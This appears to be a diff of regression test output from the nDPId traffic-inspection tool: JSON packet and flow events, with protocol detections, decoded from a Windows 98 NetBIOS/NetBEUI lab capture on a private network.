00368{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":4,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAACgAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgIA=="} 00354{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAACgAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgIA=="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":4,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409796605} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":4,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409796605}
00368{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAACQAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgAw=="} 00354{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAACQAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgAw=="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":5,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409797075} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409797075}
00368{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgAA=="} 00354{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgAA=="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":6,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409797075} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":6,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409797075}
00368{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":7,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAABwAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgAA=="} 00354{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAABwAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgAA=="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":7,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409797075} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":7,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409797075}
00368{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":8,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAACgAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgIA=="} 00354{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAACgAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgIA=="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":8,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409797101} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":8,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409797101}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576409797553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409797553,"pkt":"AFBW6YlWAFBWM3ieCABFAABgBwAAAIAR07fAqO+BwKjvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFEAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576409797553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409797553,"pkt":"AFBW6YlWAFBWM3ieCABFAABgBwAAAIAR07fAqO+BwKjvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFEAAAgAAHADAAgAAEABJPgAAYAAMCo74E="}
00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
@@ -24,316 +24,316 @@
00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576409798047,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1576409798047,"pkt":"AQBeAAACAFBWM3ieCABFAAAcCwAAAIABn7TAqO+B4AAAAgoA9f8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576409798047,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1576409798047,"pkt":"AQBeAAACAFBWM3ieCABFAAAcCwAAAIABn7TAqO+B4AAAAgoA9f8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":14,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409798047,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":14,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409798047,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":14,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409798642} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":14,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409798642}
00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":19,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409799059,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":19,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409799059,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":19,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409799428} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":19,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409799428}
00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":20,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409799059,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":20,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409799059,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":20,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409800348} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":20,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409800348}
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576409800543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800543,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEAAAAIARybrAqO+BwKjv\/wCJAIkATAq6AAQpEAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFEAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576409800543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800543,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEAAAAIARybrAqO+BwKjv\/wCJAIkATAq6AAQpEAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFEAAAgAAHADAAgAAEABJPgAAYAAMCo74E="}
00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1576409800544,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800544,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEQAAAIARyLrAqO+BwKjv\/wCJAIkATHuvAAIpEAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAaAAMCo74E="} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1576409800544,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800544,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEQAAAIARyLrAqO+BwKjv\/wCJAIkATHuvAAIpEAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAaAAMCo74E="}
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1576409800544,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800544,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEgAAAIARx7rAqO+BwKjv\/wCJAIkATA22AAgpEAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1576409800544,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800544,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEgAAAIARx7rAqO+BwKjv\/wCJAIkATA22AAgpEAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAYAAMCo74E="}
00539{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":33,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"thread_ts_msec":1576409802083,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQNg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBAABUEVaoA"} 00525{"packet_event_id":1,"packet_event_name":"packet","packet_id":33,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"thread_ts_msec":1576409802083,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQNg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBAABUEVaoA"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":33,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166,"global_ts_msec":1576409802223} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":33,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166,"global_ts_msec":1576409802223}
00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
